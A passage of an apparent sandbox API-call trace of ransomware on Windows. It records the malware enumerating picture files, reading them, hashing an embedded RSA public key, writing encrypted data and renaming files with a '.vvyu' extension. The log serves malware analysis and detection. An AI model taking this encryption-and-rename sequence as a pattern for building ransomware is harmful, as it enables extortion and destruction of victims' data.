returned 1 [0191.054] WriteFile (in: hFile=0x584, lpBuffer=0x2ae6ea0*, nNumberOfBytesToWrite=0x2807, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ae6ea0*, lpNumberOfBytesWritten=0x2f9fb14*=0x2807, lpOverlapped=0x0) returned 1 [0191.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ea0 | out: hHeap=0x2c0000) returned 1 [0191.055] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x280c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.055] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0191.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0191.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0191.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0191.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0191.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0191.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0191.056] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0191.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0191.056] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0191.057] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0191.057] CloseHandle (hObject=0x584) returned 1 [0191.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0191.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0191.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0191.058] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\OM3A-O87OLj.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\om3a-o87olj.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\OM3A-O87OLj.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\om3a-o87olj.gif.vvyu")) returned 1 [0191.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.060] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0191.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0191.062] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8669490, ftCreationTime.dwHighDateTime=0x1d8a00d, ftLastAccessTime.dwLowDateTime=0xcc805dc0, ftLastAccessTime.dwHighDateTime=0x1d8a042, ftLastWriteTime.dwLowDateTime=0xcc805dc0, ftLastWriteTime.dwHighDateTime=0x1d8a042, nFileSizeHigh=0x0, nFileSizeLow=0x59c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ooz2bCVbPPEb9WsU.png", cAlternateFileName="OOZ2BC~1.PNG")) returned 1 [0191.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3618 [0191.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0191.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3618 | out: hHeap=0x2c0000) returned 1 [0191.063] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\Ooz2bCVbPPEb9WsU.png") returned=".png" [0191.063] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\Ooz2bCVbPPEb9WsU.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\ooz2bcvbppeb9wsu.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0191.063] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=22977) returned 1 [0191.064] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0191.067] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x599b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.067] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0191.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0191.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.071] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.071] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x59c1, lpOverlapped=0x0) returned 1 [0191.072] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0191.072] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.072] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.072] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0191.074] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0191.074] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0191.074] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0191.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0191.074] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0191.074] GetLastError () returned 0x0 [0191.074] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0191.074] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0191.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.074] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0191.074] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0191.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.074] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0191.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0191.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x59c0) returned 0x2af5168 [0191.075] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0191.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0191.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0191.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0191.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3618 [0191.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f00 [0191.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3660 [0191.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f48 [0191.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fa8 [0191.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6008 [0191.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fc0 [0191.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0191.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0191.076] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0191.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0191.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fa8 | out: hHeap=0x2c0000) returned 1 [0191.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fc0 | out: hHeap=0x2c0000) returned 1 [0191.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6008 | out: hHeap=0x2c0000) returned 1 [0191.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0191.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6008 [0191.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0191.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5fc0 [0191.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0191.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae5fa8 [0191.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0191.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0191.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0191.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0191.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0191.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0191.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0191.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0191.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fc0 | out: hHeap=0x2c0000) returned 1 [0191.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0191.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fa8 | out: hHeap=0x2c0000) returned 1 [0191.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0191.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0191.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6008 | out: hHeap=0x2c0000) returned 1 [0191.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0191.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0191.081] GetCurrentThreadId () returned 0x5d8 [0191.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0191.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae56e8 [0191.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0191.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0191.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0191.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0191.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0191.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0191.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.081] GetCurrentThreadId () returned 0x5d8 [0191.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0191.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0191.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0191.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0191.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0191.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0191.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0191.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6008 [0191.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0191.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0191.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0191.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0191.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0191.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0191.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0191.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fa8 [0191.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0191.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0191.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0191.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0191.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0191.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0191.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5fc0 [0191.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0191.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0191.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0191.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f90 [0191.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0191.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6020 [0191.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0191.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ff0 [0191.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fd8 [0191.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0191.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6038 [0191.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fd8 | out: hHeap=0x2c0000) returned 1 [0191.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5fd8 [0191.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ff0 | out: hHeap=0x2c0000) returned 1 [0191.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0191.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0191.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0191.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0191.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0191.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fa8 | out: hHeap=0x2c0000) returned 1 [0191.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5fa8 [0191.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0191.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0191.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6008 | out: hHeap=0x2c0000) returned 1 [0191.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0191.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6038 | out: hHeap=0x2c0000) returned 1 [0191.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0191.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0191.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0191.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0191.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fa8 | out: hHeap=0x2c0000) returned 1 [0191.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0191.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0191.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0191.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0191.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0191.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0191.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0191.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0191.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0191.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0191.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0191.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0191.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fd8 | out: hHeap=0x2c0000) returned 1 [0191.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 